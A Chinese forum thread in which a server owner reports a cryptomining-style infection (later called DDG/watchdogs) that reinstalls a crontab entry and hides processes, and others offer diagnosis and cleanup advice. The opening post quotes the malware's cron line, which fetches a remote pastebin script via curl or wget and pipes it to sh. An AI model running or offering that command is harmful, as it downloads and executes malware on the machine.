阿里云服务器被挂马,被写入 crontab 删不掉。ps 命令找不到 nginx PHP 进程信息
hobbyliu · 2019-02-21 14:14:13 +08:00 · 7139 次点击这是一个创建于 2084 天前的主题,其中的信息可能已经有所发展或是发生改变。
*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh
crontab 被写入这段代码。删除后一会又自动加上。
ps 命令看到的进程很奇怪,php nginx 进程找你不到了,但是服务正常。
怀疑 ps 被修改, 已经从其他服务器替换了回来,但是依旧不行。
 |
1
ThirdFlame 2019-02-21 14:27:44 +08:00
可能不止 PS 被替换了啊
watchdogs 还在运行呢。 |
 |
2
dapang1221 2019-02-21 14:32:53 +08:00
alias,查一下是不是 ps 被设置别名,把奇怪的进程 grep 掉了
|
 |
3
hcymk2 2019-02-21 14:35:09 +08:00  1
|
 |
4
cpdyj0 2019-02-21 15:20:08 +08:00 via Android
检查下内核模块,有没有什么奇怪的东西
|
 |
5
huixia0010 2019-02-21 15:37:03 +08:00
有 memcache 吗~有的话,关掉试试~
|
 |
7
rogerchen 2019-02-21 16:06:22 +08:00 via iPhone
重置吧,手工不能打过 rootkit 的
|
 |
8
hobbyliu OP @huixia0010 并没有,只有 redis 怀疑是 redis 注入 shell 但是,redis 进程号找不到。。ps 命令不好使了
|
 |
9
greatbody 2019-02-21 16:34:01 +08:00
用 terraform 来管理基础设置,然后把服务全部都用容器。最后,数据库什么的都用云数据库。
应该会好很多。 |
|
10
ThirdFlame 2019-02-21 17:01:37 +08:00
@hobbyliu ps ls 可能都被替换了。
|
 |
11
c0878 2019-02-21 17:13:34 +08:00
保存数据 重装系统
另外阿里云态势感知可以用一下 |
 |
12
changliwei 2019-02-21 18:51:45 +08:00
可以实时 csysdiag 程序查看,
sysdig 这个工具的原理不是读取 /proc/的统计值,通过加载一个内核模块,对内核插入各种探测点,动态采集原始数据,再进行分析,恶意软件的隐身原理对 sysdig 不适用了. top/iotop/lsof/netstat /ps 等工具都是 /proc 下内核统计值工作的工具,很容易被恶意软件的隐藏没法查看。 安装 csysdiag 就可以查看,centos curl -s https://s3.amazonaws.com/download.draios.com/stable/install-sysdig | sudo bash Viewing: Processes For: whole machine Source: Live System Filter: evt.type!=switch PID CPU USER TH VIRT RES FILE NET Command 4101 100.00 1 317M 5M 0 0.00 <NA> 1012 4.00 root 1 118M 19M 0 0.00 csysdig 30087 0.50 1 4G 3G 0 0.00 <NA> 30084 0.50 1 4G 3G 0 0.00 <NA> 29063 0.50 1 3G 2G 0 0.00 <NA> 9387 0.50 1 4G 3G 0 0.00 <NA> 4058 0.50 1 108M 40M 0 1.69K <NA> [root@centos ]# ls -l /prox/4101 total 0 dr-xr-xr-x 2 root root 0 Feb 21 18:43 attr -rw-r--r-- 1 root root 0 Feb 21 18:43 autogroup -r-------- 1 root root 0 Feb 21 18:43 auxv -r--r--r-- 1 root root 0 Feb 21 18:43 cgroup --w------- 1 root root 0 Feb 21 18:43 clear_refs -r--r--r-- 1 root root 0 Feb 21 18:43 cmdline -rw-r--r-- 1 root root 0 Feb 21 18:43 comm -rw-r--r-- 1 root root 0 Feb 21 18:43 coredump_filter -r--r--r-- 1 root root 0 Feb 21 18:43 cpuset lrwxrwxrwx 1 root root 0 Feb 21 18:43 cwd -> / -r-------- 1 root root 0 Feb 21 18:43 environ lrwxrwxrwx 1 root root 0 Feb 21 18:43 exe -> /tmp/ksoftirqds (deleted) |
|
13
hobbyliu OP @changliwei 试了一下,还是进程缺失,php nginx 进程还是看不到
[]( https://imgchr.com/i/kWlAxJ) |
 |
14
Acoffice 2019-02-21 22:35:15 +08:00 via Android
今天上午也有个同事问这个问题,楼主如果解决,麻烦贴出解决方案哦
|
|
15
Acoffice 2019-02-21 22:52:23 +08:00 via Android
链接点进去解密可以看到定时任务都执行了什么
|
|
16
Acoffice 2019-02-21 22:53:10 +08:00 via Android
太长,我就不往上贴了
|
|
17
Acoffice 2019-02-21 23:16:16 +08:00 via Android
简单分析了下,
解决点:卸载 curl 命令,然后删除 cron,kill 掉 nohup /tmp/watchdogs >/dev/null 2>&1 进程, 然后再细看解密后都执行了哪些命令,挨个恢复. |
 |
18
abcbuzhiming 2019-02-21 23:46:55 +08:00
兄弟,我和你症状一模一样啊
https://www.v2ex.com/t/537457 |
|
19
hobbyliu OP @Acoffice 我更改了下 host 127.0.0.1 pastebin.com 基本控制住了,但是没有根治啊。找阿里云客服说也没办法让备份恢复系统盘解决。
|
 |
20
sdksang 2019-02-22 17:31:16 +08:00
大兄弟 中了 DDG 啊 。。
|
 |
22
hyshuang2006 2019-02-22 21:48:48 +08:00
哎...我的 VPS 惨了,连 root 都进不去。
|
|
23
hobbyliu OP @hyshuang2006 你设置的不允许密码登录?
|
|
24
hyshuang2006 2019-02-23 20:06:51 +08:00
|
 |
25
metas 2019-02-26 11:26:57 +08:00
|
Select Language